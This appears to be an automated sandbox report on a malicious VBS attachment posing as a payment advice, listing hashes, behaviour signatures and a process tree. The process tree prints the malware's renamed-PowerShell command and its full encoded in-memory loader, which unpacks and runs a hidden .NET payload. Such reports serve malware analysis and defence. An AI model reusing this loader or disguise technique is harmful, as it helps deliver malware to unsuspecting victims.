Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04-12-2024 09:51

General

  • Target

    PaymentAdvice-1629043.vbs

  • Size

    2.3MB

  • MD5

    9d7aa394cb39af2a434eb3036a35bb47

  • SHA1

    bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f

  • SHA256

    490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea

  • SHA512

    3b2da959a16b915d52ceadb8336fc5478e7d579a38cf59fe34f15744a0017ea9907bf5b62b4670ea123b223a0af7f3e96ab03d132055a1afd8e6983a4f856033

  • SSDEEP

    24576:dGPQzVpL6fvkC6MugzlGbhhkg6XCoCK86uTK6ClN3Br6kXIEHIQCobtMvQ8rAOSP:dGcJXxTqb38jR/4RzGfFVvC

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe
      "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2796
  • C:\Windows\system32\cmd.exe
    cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" /Y
    1⤵
    • Process spawned unexpected child process
    PID:3044

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe

    Filesize

    442KB

    MD5

    92f44e405db16ac55d97e3bfe3b132fa

    SHA1

    04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

    SHA256

    6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

    SHA512

    f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

  • memory/2796-4-0x0000000001DD0000-0x0000000001E10000-memory.dmp

    Filesize

    256KB